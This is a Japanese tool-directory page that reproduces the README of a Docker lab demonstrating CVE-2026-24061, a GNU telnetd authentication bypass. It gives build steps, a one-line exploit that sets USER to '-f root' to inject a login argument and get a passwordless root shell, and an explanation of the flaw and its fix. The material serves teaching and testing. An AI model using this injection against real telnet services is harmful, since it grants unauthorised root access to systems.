Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061_Lab — 教育用Dockerラボ。CVE-2026-24061を実演するもので、GNU telnetdにおける認証バイパスであり、USER環境変数への引数インジェクションを介してrootアクセスを可能にします。 | Kitploit
ツール/GitHubGitHub/gabs-hub/cve-2026-24061_lab
脆弱性分析エクスプロイト認証学習と教育ラボと実践
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

教育用Dockerラボ。CVE-2026-24061を実演するもので、GNU telnetdにおける認証バイパスであり、USER環境変数への引数インジェクションを介してrootアクセスを可能にします。

リポジトリを見る
27ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 Telnetd ラボ

このリポジトリには、CVE-2026-24061 の脆弱性を実証するためのシンプルな Docker ラボが含まれています。 この脆弱性により、Linux 上の GNU telnetd で認証バイパスと root アクセスが可能になります。

目的は教育専用です。

要件

  • Docker がインストールされていること
  • Telnet クライアントがインストールされていること

イメージのビルド

root@kitploit:~
docker build -t cve-2026-24061 .

コンテナの実行

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

エクスプロイト

別のターミナルで、以下を実行します:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

これにより、パスワードの要求なしで root として直接アクセスが許可されます。

注意事項

  • コンテナは脆弱なバージョンの GNU inetutils telnetd を使用しています
  • Telnet サービスは実際の環境に公開すべきではありません
  • このラボは学習とデモンストレーションのみに使用してください

脆弱性はどのように機能するのか?

この欠陥は、/usr/bin/login ユーティリティの呼び出し中に発生する引数インジェクションによるものです。telnetd は login を呼び出すために使用されるコマンドラインを動的に構築し、プレースホルダ %U を介して環境変数 USER の値をサニタイズなしで含めます。

login ユーティリティはパスワード認証を無視する -f オプションを受け入れるため、攻撃者は USER="-f root" を設定して root としての直接ログインを強制できます。

telnetd は昇格された権限で実行されるため、この操作により有効な認証情報なしで即座に root シェルが得られます。エクスプロイトは単純で、事前の操作を必要とせず、簡単に自動化できるため、CVSS スコア 9.8 が正当化されます。

この脆弱性は、USER 変数の検証とサニタイズの導入により修正され、ハイフンで始まる値と特殊文字をブロックして、login への引数インジェクションを防止しています。

ツールをダウンロード